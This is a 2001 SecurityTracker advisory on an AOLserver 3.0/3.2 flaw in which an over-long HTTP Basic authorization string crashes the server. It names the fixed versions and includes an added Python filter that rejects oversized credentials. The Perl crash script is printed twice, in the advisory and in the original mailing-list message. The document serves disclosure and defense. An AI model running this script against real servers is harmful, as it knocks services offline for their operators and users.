SecurityTracker.com
Category:   Application (Web Server/CGI)  >   AOLserver
Vendors:   America Online, Inc.
AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
SecurityTracker Alert ID:  1002267
SecurityTracker URL:  http://securitytracker.com/id/1002267
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 27 2001
Impact:   Denial of service via network
Fix Available:  Yes
Exploit Included:  Yes
Version(s): 3.0, 3.2
Description:   It is reported that previous versions of AOLserver can be crashed by remote users and may execute arbitrary code [the code execution ability has not been verified] due to improper handling of long authentication data.

In response to a Basic HTTP Authentication request, a remote user can send a long authentication string to cause the server to crash.

A demonstration exploit script is provided:

#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;

Impact:   A remote user can cause the server to crash. It has not been confirmed whether this flaw will allow a remote user to cause arbitrary code to be executed.
Solution:   It is reported that AOLserver 3.3.1 and 3.4 are not vulnerable.
Vendor URL:  www.aolserver.com/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
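
Added example (not part of the original advisory and not AOLserver code): a Python check that a front-end filter or a log-replay tool could apply to raw requests, rejecting an over-long Basic credential before it reaches the server. The 512-character limit, the function names and the sample requests are assumptions constructed for illustration; the parser accepts the bare LF line ending used in the request above.

```python
import base64
import binascii
import re

# Assumed policy limit on the base64 credential length; not a value from the advisory.
MAX_CREDENTIAL_LEN = 512

def authorization_values(raw: bytes) -> list:
    """Return Authorization header values; accepts CRLF or bare LF line endings."""
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    values = []
    for line in re.split(rb"\r?\n", head)[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"authorization":
            values.append(value.strip())
    return values

def classify_request(raw: bytes, limit: int = MAX_CREDENTIAL_LEN) -> str:
    """Return no-auth, other-scheme, oversized, malformed or ok for one raw request."""
    values = authorization_values(raw)
    if not values:
        return "no-auth"
    if len(values) > 1:
        return "malformed"  # duplicate Authorization headers are ambiguous
    scheme, _, credential = values[0].partition(b" ")
    if scheme.lower() != b"basic":
        return "other-scheme"
    credential = credential.strip()
    if len(credential) > limit:
        return "oversized"  # length is checked before any decode or copy
    try:
        decoded = base64.b64decode(credential, validate=True)
    except (binascii.Error, ValueError):
        return "malformed"
    # RFC 7617 credentials are "user-id:password", so a colon must be present
    return "ok" if b":" in decoded else "malformed"

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "valid login": b"GET / HTTP/1.0\r\nAuthorization: Basic "
                   + base64.b64encode(b"alice:s3cret") + b"\r\n\r\n",
    "2048-char credential": b"GET / HTTP/1.0\nAuthorization: Basic "
                            + b"X" * 2048 + b"\r\n\r\n",
    "no credentials": b"GET / HTTP/1.0\r\n\r\n",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(f"{label}: {classify_request(request)}")
```

The length test runs before base64 decoding, so an oversized value is rejected without being decoded or copied.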

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Patch Information) Re: AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
The vendor provides some patch information.
(Exploit Code) Re: AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
A user has provided demonstration exploit code.



 Source Message Contents

Subject:  AOLserver 3.0 vulnerability


Aolserver 3.0 will crash when it is given a long authorization string.  It 
is also possible this vulnerability will allow a hacker to execute 
arbitrary code through a buffer overflow. I have not verified a buffer 
overflow exists.  Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.

Here is a sample exploit:
------------------------------------------
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                 PeerAddr  => $host,
                                 PeerPort  => "http(80)",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;


--------------------
Nate Haggard
SecurityLogics.com 
